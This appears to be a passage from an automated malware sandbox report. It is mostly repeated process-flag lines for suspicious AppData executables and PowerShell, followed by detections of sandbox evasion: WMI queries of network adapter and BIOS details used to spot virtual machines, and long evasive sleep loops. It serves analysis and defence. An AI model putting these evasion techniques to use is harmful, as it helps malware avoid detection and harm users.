Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 5084 Thread sleep time: -25825441703193356s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3848 Thread sleep count: 9732 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4688 Thread sleep count: 9481 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1200000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199624s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199498s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198794s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198680s >= -30000s Jump to behavior
